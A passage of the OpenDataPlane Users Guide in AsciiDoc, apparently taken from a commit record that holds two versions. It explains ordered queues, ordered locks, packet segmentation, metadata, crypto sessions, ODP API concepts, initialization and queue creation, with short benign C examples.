queues, with the easy synchronization of atomic\nqueues.\n\n.Ordered Queue Scheduling\nimage::..\/images\/ordered_queue.svg[align=\"center\"]\n\nWhen scheduling events from an ordered queue, the scheduler dispatches multiple\nevents from the queue in parallel to different threads, however the scheduler\nalso ensures that the relative sequence of these events on output queues\nis identical to their sequence from their originating ordered queue.\n\nAs with atomic queues, the ordering guarantees associated with ordered queues\nrefer to events originating from the same queue, not for those originating on\ndifferent queues. Thus in this figure three thread are processing events 5, 3,\nand 4, respectively from the first ordered queue. Regardless of how these\nthreads complete processing, these events will appear in their original\nrelative order on their output queue.\n\n==== Order Preservation\nRelative order is preserved independent of whether events are being sent to\ndifferent output queues. For example, if some events are sent to output queue\nA while others are sent to output queue B then the events on these output\nqueues will still be in the same relative order as they were on their\noriginating queue. Similarly, if the processing consumes events so that no\noutput is issued for some of them (_e.g.,_ as part of IP fragment reassembly\nprocessing) then other events will still be correctly ordered with respect to\nthese sequence gaps. Finally, if multiple events are enqueued for a given\norder (_e.g.,_ as part of packet segmentation processing for MTU\nconsiderations), then each of these events will occupy the originator's\nsequence in the target output queue(s). In this case the relative order of these\nevents will be in the order that the thread issued *odp_queue_enq()* calls for\nthem.\n\nThe ordered context associated with the dispatch of an event from an ordered\nqueue lasts until the next scheduler call or until explicitly released by\nthe thread calling *odp_schedule_release_ordered()*. This call may be used\nas a performance advisory that the thread no longer requires ordering\nguarantees for the current context. As a result, any subsequent enqueues\nwithin the current scheduler context will be treated as if the thread was\noperating in a parallel queue context.\n\n==== Ordered Locking\nAnother powerful feature of the scheduler's handling of ordered queues is\n*ordered locks*. Each ordered queue has associated with it a number of ordered\nlocks as specified by the _lock_count_ parameter at queue create time.\n\nOrdered locks provide an efficient means to perform in-order sequential\nprocessing within an ordered context. For example, supposed events with relative\norder 5, 6, and 7 are executing in parallel by three different threads. An\nordered lock will enable these threads to synchronize such that they can\nperform some critical section in their originating queue order. The number of\nordered locks supported for each ordered queue is implementation dependent (and\nqueryable via the *odp_config_max_ordered_locks_per_queue()* API). If the\nimplementation supports multiple ordered locks then these may be used to\nprotect different ordered critical sections within a given ordered context.\n\n==== Summary: Ordered Queues\nTo see how these considerations fit together, consider the following code:\n\n.Processing with Ordered Queues\n[source,c]\n----\nvoid worker_thread()\n odp_init_local();\n ...other initialization processing\n\n while (1) {\n ev = odp_schedule(&which_q, ODP_SCHED_WAIT);\n ...process events in parallel\n odp_schedule_order_lock(0);\n ...critical section processed in order\n odp_schedule_order_unlock(0);\n ...continue processing in parallel\n odp_queue_enq(dest_q, ev);\n }\n}\n----\n\nThis represents a simplified structure for a typical worker thread operating\non ordered queues. Multiple events are processed in parallel and the use of\nordered queues ensures that they will be placed on +dest_q+ in the same order\nas they originated. While processing in parallel, the use of ordered locks\nenables critical sections to be processed in order within the overall parallel\nflow. When a thread arrives at the *odp_schedule_order_lock()* call, it waits\nuntil the locking order for this lock for all prior events has been resolved\nand then enters the critical section. The *odp_schedule_order_unlock()* call\nreleases the critical section and allows the next order to enter it.\n\n=== Queue Scheduling Summary\n\nNOTE: Both ordered and parallel queues improve throughput over atomic queues\ndue to parallel event processing, but require that the application take\nsteps to ensure context data synchronization if needed.\n\n== Packet Processing\nODP applications are designed to process packets, which are the basic unit of\ndata of interest in the data plane. To assist in processing packets, ODP\nprovides a set of APIs that enable applications to examine and manipulate\npacket data and metadata. Packets are referenced by an abstract *odp_packet_t*\nhandle defined by each implementation.\n\nPacket objects are normally created at ingress when they arrive at a source\n*odp_pktio_t* and are received by an application either directly or (more\ntypically) for a scheduled receive queue. They MAY be implicitly freed when\nthey are transmitted to an output *odp_pktio_t* via an associated transmit\nqueue, or freed directly via the +odp_packet_free()+ API.\n\nOccasionally an application may originate a packet itself, either _de novo_ or\nby deriving it from an existing packet, and APIs are provided to assist in\nthese cases as well. Application-created packets can be recycled back through\na _loopback interface_ to reparse and reclassify them, or the application can\ndo its own parsing as desired.\n\nVarious attributes associated with a packet, such as parse results, are\nstored as metadata and APIs are provided to permit applications to examine\nand\/or modify this information.\n\n=== Packet Structure and Concepts\nA _packet_ consists of a sequence of octets conforming to an architected\nformat, such as Ethernet, that can be received and transmitted via the ODP\n*pktio* abstraction. Packets of a _length_, which is the number of bytes in\nthe packet. Packet data in ODP is referenced via _offsets_ since these reflect\nthe logical contents and structure of a packet independent of how particular\nODP implementations store that data.\n\nThese concepts are shown in the following diagram:\n\n.ODP Packet Structure\nimage::..\/images\/packet.svg[align=\"center\"]\n\nPacket data consists of zero or more _headers_ followed by 0 or more bytes of\n_payload_, followed by zero or more _trailers_. Shown here are various APIs\nthat permit applications to examine and navigate various parts of a packet and\nto manipulate its structure.\n\nTo support packet manipulation, predefined _headroom_ and _tailroom_\nareas are logically associated with a packet. Packets can be adjusted by\n_pulling_ and _pushing_ these areas. Typical packet processing might consist\nof stripping headers from a packet via +odp_pull_head()+ calls as part of\nreceive processing and then replacing them with new headers via\n+odp_push_head()+ calls as the packet is being prepared for transmit.\n\n=== Packet Segments and Addressing\nODP platforms use various methods and techniques to store and process packets\nefficiently. These vary considerably from platform to platform, so to ensure\nportability across them ODP adopts certain conventions for referencing\npackets.\n\nODP APIs use a handle of type *odp_packet_t* to refer to packet objects.\nAssociated with packets are various bits of system metadata that describe the\npacket. By referring to the metadata, ODP applications accelerate packet\nprocessing by minimizing the need to examine packet data. This is because the\nmetadata is populated by parsing and classification functions that are coupled\nto ingress processing that occur prior to a packet being presented to the\napplication via the ODP scheduler.\n\nWhen an ODP application needs to examine the contents of a packet, it requests\naddressability to it via an API call that makes the packet (or a contiguously\naddressable _segment_ of it) available for coherent access by the application.\nTo ensure portability, ODP applications assume that the underlying\nimplementation stores packets in _segments_ of implementation-defined\nand managed size. These represent the contiguously addressable portions of a\npacket that the application may refer to via normal memory accesses. ODP\nprovides APIs that allow applications to operate on packet segments in an\nefficient and portable manner as needed. By combining these with the metadata\nprovided by packets, ODP applications can operate in a fully\nplatform-independent manner while still achieving optimal performance across\nthe range of platforms that support ODP.\n\nThe use of segments for packet addressing and their relationship to metadata\nis shown in this diagram:\n\n.ODP Packet Segmentation\nimage::..\/images\/segment.svg[align=\"center\"]\n\nThe packet metadata is set during parsing and identifies the starting offsets\nof the various headers in the packet. The packet itself is physically stored\nas a sequence of segments that area managed by the ODP implementation.\nSegment 0 is the first segment of the packet and is where the packet's headroom\nand headers typically reside. Depending on the length of the packet,\nadditional segments may be part of the packet and contain the remaining packet\npayload and tailroom. The application need not concern itself with segments\nexcept that when the application requires addressability to a packet it\nunderstands that addressability is provided on a per-segment basis. So, for\nexample, if the application makes a call like +odp_packet_l4_ptr()+ to obtain\naddressability to the packet's Layer 4 header, the returned length from that\ncall is the number of bytes from the start of the Layer 4 header that are\ncontiguously addressable to the application from the returned pointer address.\nThis is because the following byte occupies a different segment and may be\nstored elsewhere. To obtain access to those bytes, the application simply\nrequests addressability to that offset and it will be able to address the\npacket bytes that occupy the next segment, etc. Note that the returned\nlength for any packet addressability call is always the lesser of the remaining\npacket length or size of its containing segment. So a mapping for segment 2\nin the above figure, for example, would return a length that extends only to\nthe end of the packet since the remaining bytes are part of the tailroom\nreserved for the packet and are not usable by the application until made\navailable to it by an appropriate API call.\n\n=== Metadata Processing\nAs noted, packet metadata is normally set by the parser as part of\nclassification that occurs during packet receive processing. It is important\nto note that this metadata may be changed by the application to reflect\nchanges in the packet contents and\/or structure as part of its processing of\nthe packet. While changing this metadata may effect some ODP APIs, changing\nmetadata is designed to _document_ application changes to the packet but\ndoes not in itself _cause_ those changes to be made. For example, if an\napplication changes the Layer 3 offset by using the +odp_packet_l3_offset_set()+\nAPI, the subsequent calls to +odp_packet_l3_ptr()+ will return an address\nstarting from that changed offset, changing an attribute like\n+odp_packet_has_udp_set()+ will not, by itself, turn a non-UDP packet into\na valid UDP packet. Applications are expected to exercise appropriate care\nwhen changing packet metadata to ensure that the resulting metadata changes\nreflect the actual changed packet structure that the application has made.\n\n== Cryptographic services\n\nODP provides support for cryptographic operations required by various security\nprotocols (e.g. IPSec). To apply a cryptographic operation to a packet a session\nmust be created first. Packets processed by a session share the same cryptographic\nparameters like algorithms, keys, initialization vectors. A session is created with\n*odp_crypto_session_create()* call. After session creation a cryptographic operation\ncan be applied to a packet using *odp_crypto_operation()* call.\nDepending on the session type - synchronous or asynchronous the operation returns\nwhen the operation completed or after the request has been submitted. In the\nasynchronous case an operation completion event will be enqueued on the session\ncompletion queue. The completion event conveys the status of the operation and\nthe result. The application has the responsibility to free the completion event.\nThe operation arguments specify for each packet the areas which are to be encrypted\nor decrypted and authenticated. Also, in asynchronous case a context can be\nassociated with a given operation and when the operation completion event is\nretrieved the associated context can be retrieved. An operation can be executed\nin-place, when the output packet is the same as the input packet or the output\npacket can be a new packet provided by the application or allocated by the\nimplementation from the session output pool.\n\ninclude::users-guide-tm.adoc[]\n\ninclude::..\/glossary.adoc[]\n","old_contents":":doctitle: OpenDataPlane (ODP) Users-Guide\n:description: This document is intended to guide a new OpenDataPlane +\napplication developer.\n:toc:\n\n:numbered!:\n[abstract]\nAbstract\n--------\nThis document is intended to guide a new ODP application developer.\nFurther details about ODP may be found at the http:\/\/opendataplane.org[ODP]\nhome page.\n\n.Overview of a system running ODP applications\nimage::..\/images\/overview.svg[align=\"center\"]\n\nODP is an API specification that allows many implementations to provide\nplatform independence, automatic hardware acceleration and CPU scaling to\nhigh performance networking applications. This document describes how to\nwrite an application that can successfully take advantage of the API.\n\n:numbered:\n== Introduction\n.OpenDataPlane Components\nimage::..\/images\/odp_components.svg[align=\"center\"]\n\n.The ODP API Specification\nODP consists of three separate but related component parts. First, ODP is an\nabstract API specification that describes a functional model for\ndata plane applications. This specification covers many common data plane\napplication programming needs, such as the ability to receive, manipulate, and\ntransmit packet data, without specifying how these functions are performed. This\nis quite intentional. It is precisely because ODP APIs do not have a preferred\nembodiment that they permit innovation in how these functions can\nbe realized on various platforms that offer implementations of ODP. To achieve\nthis goal, ODP APIs are described using abstract data types whose definition\nis left up to the ODP implementer. For example, in ODP packets are referenced\nby abstract handles of type +odp_packet_t+, and packet-related APIs take\narguments of this type. What an +odp_packet_t+ actually is is not part of the\nODP API specification--that is the responsibility of each ODP implementation.\n\n.Summary: ODP API attributes:\n* Open Source, open contribution, BSD-3 licensed.\n* Vendor and platform neutral.\n* Application-centric. Covers functional needs of data plane applications.\n* Ensures portability by specifying the functional behavior of ODP.\n* Defined jointly and openly by application writers and platform implementers.\n* Architected to be implementable on a wide range of platforms efficiently\n* Sponsored, governed, and maintained by the Linaro Networking Group (LNG)\n\n.ODP Implementations\nSecond, ODP consists of multiple implementations of this API specification,\neach tailored to a specific target platform. ODP implementations determine\nhow each ODP abstract type is represented on that platform and how each ODP\nAPI is realized. On some platforms, ODP APIs will\nbe realized using specialized instructions that accelerate the functional\nbehavior specified by the API. On others, hardware co-processing engines may\ncompletely offload the API so that again it can be performed with little or no\ninvolvement by a CPU. In all cases, the application sees the same\nfunctional behavior independent of how a given platform has chosen to realize\nit. By allowing each platform the freedom to determine how best to realize each\nAPI's specified functional behavior in an optimal manner, ODP permits\napplications written to its APIs to take full advantage of the unique\ncapabilities of each platform without the application programmer needing to\nhave specialist knowledge of that platform or to be concerned with how best\nto tune the application to a particular platform. This latter consideration is\nparticularly important in Network Function Virtualization (NFV) environments\nwhere the application will run on a target platform chosen by someone else.\n\n.Summary: ODP Implementation Characteristics\n* One size does not fit all--supporting multiple implementations allows ODP\nto adapt to widely differing internals among platforms.\n* Anyone can create an ODP implementation tailored to their platform\n* Distribution and maintenance of each implementation is as owner wishes\n - Open source or closed source as business needs determine\n - Have independent release cycles and service streams\n* Allows HW and SW innovation in how ODP APIs are implemented on each platform.\n\n.Reference Implementations\nTo make it easy to get started with implementing ODP on a new platform, ODP\nsupplies a number of _reference implementations_ that can serve as a\nstarting point. The two primary references implementations supplied by ODP are\n*odp-linux* and *odp-dpdk*\n\n.odp-linux\nThe *odp-linux* reference implementation is a pure SW implementation of the\nODP API that relies only on the Linux programming API. As a functional model\nfor ODP, it enables ODP to be bootstrapped easily to any platform that\nsupports a Linux kernel.\n\n.odp-dpdk\nThe *odp-dpdk* reference implementation is a pure SW implementation of the\nODP API that uses http:\/\/dpdk.org[DPDK] as a SW accelerator. In particular,\n*odp-dpdk* offers superior I\/O performance for systems that use NICs, allowing\nODP applications to take immediate full advantage of the various NIC device\ndrivers supported by DPDK.\n\n.Summary: ODP Reference Implementations\n* Open source, open contribution, BSD-3 licensed.\n* Provide easy bootstrapping of ODP onto new platforms\n* Implementers free to borrow or tailor code as needed for their platform\n* Implementers retain full control over their implementations whether or not\nthey are derived from a reference implementation.\n\n.ODP Validation Test Suite\nThird, to ensure consistency between different ODP implementations, ODP\nconsists of a validation suite that verifies that any given implementation of\nODP faithfully provides the specified functional behavior of each ODP API.\nAs a separate open source component, the validation suite may be used by\napplication writers, system integrators, and platform providers alike to\nconfirm that any purported implementation of ODP does indeed conform to the\nODP API specification.\n\n.Summary: ODP Validation Test Suite\n* Synchronized with ODP API specification\n* Maintained and distributed by LNG\n* Open source, open contribution, BSD-3 licensed.\n* Key to ensuring application portability across all ODP implementations\n* Tests that ODP implementations conform to the specified functional behavior\nof ODP APIs.\n* Can be run at any time by users and vendors to validate implementations\nof ODP.\n\n=== ODP API Specification Versioning\nAs an evolving standard, the ODP API specification is released under an\nincrementing version number, and corresponding implementations of ODP, as well\nas the validation suite that verifies API conformance, are linked to this\nversion number. ODP versions are specified using a standard three-level\nnumber (major.minor.fixlevel) that are incremented according to the degree of\nchange the level represents. Increments to the fix level represent clarification\nof the specification or other minor changes that do not affect either the\nsyntax or semantics of the specification. Such changes in the API specification\nare expected to be rare. Increments to the minor level\nrepresent the introduction of new APIs or functional capabilities, or changes\nto he specified syntax or functional behavior of APIs and thus may require\napplication source code changes. Such changes are well documented in the\nrelease notes for each revision of the specification. Finally, increments to\nthe major level represent significant structural changes that most likely\nrequire some level of application source code change, again as documented in\nthe release notes for that version.\n\n=== ODP Implementation Versioning\nODP implementations are free to use whatever release naming\/numbering\nconventions they wish, as long as it is clear what level of the ODP API a given\nrelease implements. A recommended convention is to use the same three level\nnumbering scheme where the major and minor numbers correspond to the ODP API\nlevel and the fix level represents an implementation-defined service level\nassociated with that API level implementation. The LNG-supplied ODP reference\nimplementations follow this convention.\n\n=== ODP Validation Test Suite Versioning\nThe ODP validation test suite follows these same naming conventions. The major\nand minor release numbers correspond to the ODP API level that the suite\nvalidates and the fix level represents the service level of the validation\nsuite itself for that API level.\n\n=== ODP Design Goals\nODP has three primary goals that follow from its component structure. The first\nis application portability across a wide range of platforms. These platforms\ndiffer in terms of processor instruction set architecture, number and types of\napplication processing cores, memory organization, as well as the number and\ntype of platform specific hardware acceleration and offload features that\nare available. ODP applications can move from one conforming implementation\nto another with at most a recompile.\n\nSecond, ODP is designed to permit data plane applications to avail themselves\nof platform-specific features, including specialized hardware accelerators,\nwithout specialized programming. This is achieved by separating the API\nspecification from their implementation on individual platforms. Since each\nplatform implements each ODP API in a manner optimal to that platform,\napplications automatically gain the benefit of such optimizations without the\nneed for explicit programming.\n\nThird, ODP is designed to allow applications to scale out automatically to\nsupport many core architectures. This is done using an event based programming\nmodel that permits applications to be written to be independent of the number\nof processing cores that are available to realize application function. The\nresult is that an application written to this model does not require redesign\nas it scales from 4, to 40, to 400 cores.\n\n== Organization of this Document\nThis document is organized into several sections. The first presents a high\nlevel overview of the ODP API component areas and their associated abstract\ndata types. This section introduces ODP APIs at a conceptual level.\nThe second provides a tutorial on the programming model(s)\nsupported by ODP, paying particular attention to the event model as this\nrepresents the preferred structure for most ODP applications. This section\nbuilds on the concepts introduced in the first section and shows how ODP\napplications are structured to best realize the three ODP design goals\nmentioned earlier. The third section provides a more detailed overview of\nthe major ODP API components and is designed to serve as a companion to the\nfull reference specification for each API. The latter is intended to be used\nby ODP application programmers, as well as implementers, to understand the\nprecise syntax and semantics of each API.\n\n== ODP API Concepts\nODP programs are built around several conceptual structures that every\napplication programmer needs to be familiar with to use ODP effectively. The\nmain ODP concepts are:\nThread, Event, Queue, Pool, Shared Memory, Buffer, Packet, PktIO, Time, Timer,\nand Synchronizer.\n\n=== Thread\nThe thread is the fundamental programming unit in ODP. ODP applications are\norganized into a collection of threads that perform the work that the\napplication is designed to do. ODP threads may or may not share memory with\nother threads--that is up to the implementation. Threads come in two \"flavors\":\ncontrol and worker, that are represented by the abstract type\n+odp_thread_type_t+.\n\nA control thread is a supervisory thread that organizes\nthe operation of worker threads. Worker threads, by contrast, exist to\nperform the main processing logic of the application and employ a run to\ncompletion model. Worker threads, in particular, are intended to operate on\ndedicated processing cores, especially in many core processing environments,\nhowever a given implementation may multitask multiple threads on a single\ncore if desired (typically on smaller and lower performance target\nenvironments).\n\nIn addition to thread types, threads have associated _attributes_ such as\n_thread mask_ and _scheduler group_ that determine where they can run and\nthe type of work that they can handle. These will be discussed in greater\ndetail later.\n\n=== Event\nEvents are what threads process to perform their work. Events can represent\nnew work, such as the arrival of a packet that needs to be processed, or they\ncan represent the completion of requests that have executed asynchronously.\nEvents can also represent notifications of the passage of time, or of status\nchanges in various components of interest to the application. Events have an\nevent type that describes what it represents. Threads can create new events\nor consume events processed by them, or they can perform some processing on\nan event and then pass it along to another component for further processing.\nReferences to events are via handles of abstract type +odp_event_t+. Cast\nfunctions are provided to convert these into specific handles of the\nappropriate type represented by the event.\n\n=== Queue\nA queue is a message passing channel that holds events. Events can be\nadded to a queue via enqueue operations or removed from a queue via dequeue\noperations. The endpoints of a queue will vary depending on how it is used.\nQueues come in two major types: polled and scheduled, which will be\ndiscussed in more detail when the event model is introduced. Queues may also\nhave an associated context, which represents a persistent state for all\nevents that make use of it. These states are what permit threads to perform\nstateful processing on events as well as stateless processing.\n\nQueues are represented by handles of abstract type +odp_queue_t+.\n\n=== Pool\nA pool is a shared memory area from which elements may be drawn. Pools\nrepresent the backing store for events, among other things. Pools are\ntypically created and destroyed by the application during initialization and\ntermination, respectively, and then used during processing. Pools may be\nused by ODP components exclusively, by applications exclusively, or their\nuse may be shared between the two. Pools have an associated type that\ncharacterizes the elements that they contain. The two most important pool types\nare Buffer and Packet.\n\nPools are represented by handles of abstract type +odp_pool_t+.\n\n=== Shared Memory\nShared memory represents raw blocks of storage that are sharable between\nthreads. They are the building blocks of pools but can be used directly by\nODP applications if desired.\n\nShared memory is represented by handles of abstract type +odp_shm_t+.\n\n=== Buffer\nA buffer is a fixed sized block of shared storage that is used by ODP\ncomponents and\/or applications to realize their function. Buffers contain\nzero or more bytes of application data as well as system maintained\nmetadata that provide information about the buffer, such as its size or the\npool it was allocated from. Metadata is an important ODP concept because it\nallows for arbitrary amounts of side information to be associated with an\nODP object. Most ODP objects have associated metadata and this metadata is\nmanipulated via accessor functions that act as getters and setters for\nthis information. Getter access functions permit an application to read\na metadata item, while setter access functions permit an application to write\na metadata item. Note that some metadata is inherently read only and thus\nno setter is provided to manipulate it. When object have multiple metadata\nitems, each has its own associated getter and\/or setter access function to\ninspect or manipulate it.\n\nBuffers are represented by handles of abstract type +odp_buffer_t+.\n\n=== Packet\nPackets are received and transmitted via I\/O interfaces and represent\nthe basic data that data plane applications manipulate.\nPackets are drawn from pools of type +ODP_POOL_PACKET+.\nUnlike buffers, which are simple objects,\nODP packets have a rich set of semantics that permit their inspection\nand manipulation in complex ways to be described later. Packets also support\na rich set of metadata as well as user metadata. User metadata permits\napplications to associate an application-determined amount of side information\nwith each packet for its own use.\n\nPackets are represented by handles of abstract type +odp_packet_t+.\n\n=== PktIO\nPktIO is how ODP represents I\/O interfaces. A pktio object is a logical\nport capable of receiving and\/or transmitting packets. This may be directly\nsupported by the underlying platform as an integrated feature,\nor may represent a device attached via a PCIE or other bus.\n\nPktIOs are represented by handles of abstract type +odp_pktio_t+.\n\n=== Time\nThe time API is used to measure time intervals and track time flow of an\napplication and presents a convenient way to get access to a time source.\nThe time API consists of two main parts: local time API and global time API.\n\n==== Local time\nThe local time API is designed to be used within one thread and can be faster\nthan the global time API. The local time API cannot be used between threads as\ntime consistency is not guaranteed, and in some cases that's enough.\nSo, local time stamps are local to the calling thread and must not be shared\nwith other threads. Current local time can be read with +odp_time_local()+.\n\n==== Global time\nThe global time API is designed to be used for tracking time between threads.\nSo, global time stamps can be shared between threads. Current global time can\nbe read with +odp_time_global()+.\n\nBoth, local and global time is not wrapped during the application life cycle.\nThe time API includes functions to operate with time, such as +odp_time_diff()+,\n+odp_time_sum()+, +odp_time_cmp()+, conversion functions like\n+odp_time_to_ns()+, +odp_time_local_from_ns()+, +odp_time_global_from_ns()+.\nTo get rate of time source +odp_time_local_res()+, +odp_time_global_res()+\nare used. To wait, +odp_time_wait_ns()+ and +odp_time_wait_until()+ are used,\nduring witch a thread potentially busy loop the entire wait time.\n\nThe +odp_time_t+ opaque type represents local or global timestamps.\n\n=== Timer\nTimers are how ODP applications measure and respond to the passage of time.\nTimers are drawn from specialized pools called timer pools that have their\nown abstract type (+odp_timer_pool_t+). Applications may have many timers\nactive at the same time and can set them to use either relative or absolute\ntime. When timers expire they create events of type +odp_timeout_t+, which\nserve as notifications of timer expiration.\n\n=== Synchronizer\nMultiple threads operating in parallel typically require various\nsynchronization services to permit them to operate in a reliable and\ncoordinated manner. ODP provides a rich set of locks, barriers, and similar\nsynchronization primitives, as well as abstract types for representing various\ntypes of atomic variables. The ODP event model also makes use of queues to\navoid the need for explicit locking in many cases. This will be discussed\nin the next section.\n\n== ODP Components ==\nBuilding on ODP concepts, ODP offers several components that relate to the\nflow of work through an ODP application. These include the Classifier,\nScheduler, and Traffic Manager. These components relate to the three\nmain stages of packet processing: Receive, Process, and Transmit.\n\n=== Classifier\nThe *Classifier* provides a suite of APIs that control packet receive (RX)\nprocessing.\n\n.ODP Receive Processing with Classifier\nimage::..\/images\/odp_rx_processing.svg[align=\"center\"]\n\nThe classifier provides two logically related services:\n[horizontal]\nPacket parsing:: Verifying and extracting structural information from a\nreceived packet.\n\nPacket classification:: Applying *Pattern Matching Rules (PMRs)* to the\nparsed results to assign an incoming packet to a *Class of Service (CoS)*.\n\nCombined, these permit incoming packets to be sorted into *flows*, which are\nlogically related sequences of packets that share common processing\nrequirements. While many data plane applications perform stateless packet\nprocessing (_e.g.,_ for simple forwarding) others perform stateful packet\nprocessing. Flows anchor state information relating to these groups of\npackets.\n\nA CoS determines two variables for packets belonging to a flow:\n[list]\n* The pool that they will be stored in on receipt\n* The queue that they will be added to for processing\n\nThe PMRs supported by ODP permit flow determination based on combinations of\npacket field values (tuples). The main advantage of classification is that on\nmany platforms these functions are performed in hardware, meaning that\nclassification occurs at line rate as packets are being received without\nany explicit processing by the ODP application.\n\nNote that the use of the classifier is optional. Applications may directly\nreceive packets from a corresponding PktIO input queue via direct polling\nif they choose.\n\n=== Scheduler\nThe *Scheduler* provides a suite of APIs that control scalable event\nprocessing.\n\n.ODP Scheduler and Event Processing\nimage::..\/images\/odp_scheduling.svg[align=\"center\"]\n\nThe Scheduler is responsible for selecting and dispatching one or more events\nto a requesting thread. Event selection is based on several factors involving\nboth the queues containing schedulable events and the thread making an\n+odp_schedule()+ or +odp_schedule_multi()+ call.\n\nODP queues have a _scheduling priority_ that determines how urgently events\non them should be processed relative to events contained in other queues.\nQueues also have a _scheduler group id_ associated with them that must match\nthe associated scheduler group _thread mask_ of the thread calling the\nscheduler. This permits events to be grouped for processing into classes and\nhave threads that are dedicated to processing events from specified classes.\nThreads can join and leave scheduler groups dynamically, permitting easy\napplication response to increases in demand.\n\nWhen a thread receives an event from the scheduler, it in turn can invoke\nother processing engines via ODP APIs (_e.g.,_ crypto processing) that\ncan operate asynchronously. When such processing is complete, the result is\nthat a *completion event* is added to a schedulable queue where it can be\nscheduled back to a thread to continue processing with the results of the\nrequested asynchronous operation.\n\nThreads themselves can enqueue events to queues for downstream processing\nby other threads, permitting flexibility in how applications structure\nthemselves to maximize concurrency.\n\n=== Traffic Manager\nThe *Traffic Manager* provides a suite of APIs that control traffic shaping and\nQuality of Service (QoS) processing for packet output.\n\n.ODP Transmit processing with Traffic Manager\nimage::..\/images\/odp_traffic_manager.svg[align=\"center\"]\n\nThe final stage of packet processing is to transmit it. Here, applications have\nseveral choices. As with RX processing, applications may send packets\ndirectly to PktIO TX queues for direct transmission. Often, however,\napplications need to perform traffic shaping and related\n*Quality of Service (QoS)* processing on the packets comprising a flow as part\nof transmit processing. To handle this need, ODP provides a suite of\n*Traffic Manager* APIs that permit programmatic establishment of arbiters,\nshapers, etc. that control output packet processing to achieve desired QoS\ngoals. Again, the advantage here is that on many platforms traffic management\nfunctions are implemented in hardware, permitting transparent offload of\nthis work.\n\n== ODP Application Programming\nAt the highest level, an *ODP Application* is a program that uses one or more\nODP APIs. Because ODP is a framework rather than a programming environment,\napplications are free to also use other APIs that may or may not provide the\nsame portability characteristics as ODP APIs.\n\nODP applications vary in terms of what they do and how they operate, but in\ngeneral all share the following characteristics:\n\n. They are organized into one or more _threads_ that execute in parallel.\n. These threads communicate and coordinate their activities using various\n_synchronization_ mechanisms.\n. They receive packets from one or more _packet I\/O interfaces_.\n. They examine, transform, or otherwise process packets.\n. They transmit packets to one or more _packet I\/O interfaces_.\n\nODP provides APIs to assist in each of these areas.\n\n=== The include structure\nApplications only include the 'include\/odp.h' file, which includes the\n'platform\/<implementation name>\/include\/odp' files to provide a complete\ndefinition of the API on that platform. The doxygen documentation defining\nthe behavior of the ODP API is all contained in the public API files, and the\nactual definitions for an implementation will be found in the per platform\ndirectories. Per-platform data that might normally be a +#define+ can be\nrecovered via the appropriate access function if the #define is not directly\nvisible to the application.\n\n.Users include structure\n----\n.\/\n\u251c\u2500\u2500 include\/\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 odp\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 api\/\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 The Public API and the documentation.\n\u2502\u00a0\u00a0 \u2502\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 odp.h This file should be the only file included by the application.\n----\n\n=== Initialization\nIMPORTANT: ODP depends on the application to perform a graceful shutdown,\ncalling the terminate functions should only be done when the application is\nsure it has closed the ingress and subsequently drained all queues, etc.\n\n=== Startup\nThe first API that must be called by an ODP application is 'odp_init_global()'.\nThis takes two pointers. The first, +odp_init_t+, contains ODP initialization\ndata that is platform independent and portable, while the second,\n+odp_platform_init_t+, is passed unparsed to the implementation\nto be used for platform specific data that is not yet, or may never be\nsuitable for the ODP API.\n\nCalling odp_init_global() establishes the ODP API framework and MUST be\ncalled before any other ODP API may be called. Note that it is only called\nonce per application. Following global initialization, each thread in turn\ncalls 'odp_init_local()' is called. This establishes the local ODP thread\ncontext for that thread and MUST be called before other ODP APIs may be\ncalled by that thread.\n\n=== Shutdown\nShutdown is the logical reverse of the initialization procedure, with\n'odp_term_local()' called for each thread before 'odp_term_global()' is\ncalled to terminate ODP.\n\n.ODP Application Structure Flow Diagram\nimage::..\/images\/resource_management.svg[align=\"center\"]\n\n== Common Conventions\nMany ODP APIs share common conventions regarding their arguments and return\ntypes. This section highlights some of the more common and frequently used\nconventions.\n\n=== Handles and Special Designators\nODP resources are represented via _handles_ that have abstract type\n_odp_resource_t_. So pools are represented by handles of type +odp_pool_t+,\nqueues by handles of type +odp_queue_t+, etc. Each such type\nhas a distinguished type _ODP_RESOURCE_INVALID_ that is used to indicate a\nhandle that does not refer to a valid resource of that type. Resources are\ntypically created via an API named _odp_resource_create()_ that returns a\nhandle of type _odp_resource_t_ that represents the created object. This\nreturned handle is set to _ODP_RESOURCE_INVALID_ if, for example, the\nresource could not be created due to resource exhaustion. Invalid resources\ndo not necessarily represent error conditions. For example, +ODP_EVENT_INVALID+\nin response to an +odp_queue_deq()+ call to get an event from a queue simply\nindicates that the queue is empty.\n\n=== Addressing Scope\nUnless specifically noted in the API, all ODP resources are global to the ODP\napplication, whether it runs as a single process or multiple processes. ODP\nhandles therefore have common meaning within an ODP application but have no\nmeaning outside the scope of the application.\n\n=== Resources and Names\nMany ODP resource objects, such as pools and queues, support an\napplication-specified character string _name_ that is associated with an ODP\nobject at create time. This name serves two purposes: documentation, and\nlookup. The lookup function is particularly useful to allow an ODP application\nthat is divided into multiple processes to obtain the handle for the common\nresource.\n\n== Queues\nQueues are the fundamental event sequencing mechanism provided by ODP and all\nODP applications make use of them either explicitly or implicitly. Queues are\ncreated via the 'odp_queue_create()' API that returns a handle of type\n+odp_queue_t+ that is used to refer to this queue in all subsequent APIs that\nreference it. Queues have one of two ODP-defined _types_, POLL, and SCHED that\ndetermine how they are used. POLL queues directly managed by the ODP\napplication while SCHED queues make use of the *ODP scheduler* to provide\nautomatic scalable dispatching and synchronization services.\n\n.Operations on POLL queues\n[source,c]\n----\nodp_queue_t poll_q1 = odp_queue_create(\"poll queue 1\", ODP_QUEUE_TYPE_POLL, NULL);\nodp_queue_t poll_q2 = odp_queue_create(\"poll queue 2\", ODP_QUEUE_TYPE_POLL, NULL);\n...\nodp_event_t ev = odp_queue_deq(poll_q1);\n...do something\nint rc = odp_queue_enq(poll_q2, ev);\n----\n\nThe key distinction is that dequeueing events from POLL queues is an\napplication responsibility while dequeueing events from SCHED queues is the\nresponsibility of the ODP scheduler.\n\n.Operations on SCHED queues\n[source,c]\n----\nodp_queue_param_t qp;\nodp_queue_param_init(&qp);\nodp_schedule_prio_t prio = ...;\nodp_schedule_group_t sched_group = ...;\nqp.sched.prio = prio;\nqp.sched.sync = ODP_SCHED_SYNC_[NONE|ATOMIC|ORDERED];\nqp.sched.group = sched_group;\nqp.lock_count = n; \/* Only relevant for ordered queues *\/\nodp_queue_t sched_q1 = odp_queue_create(\"sched queue 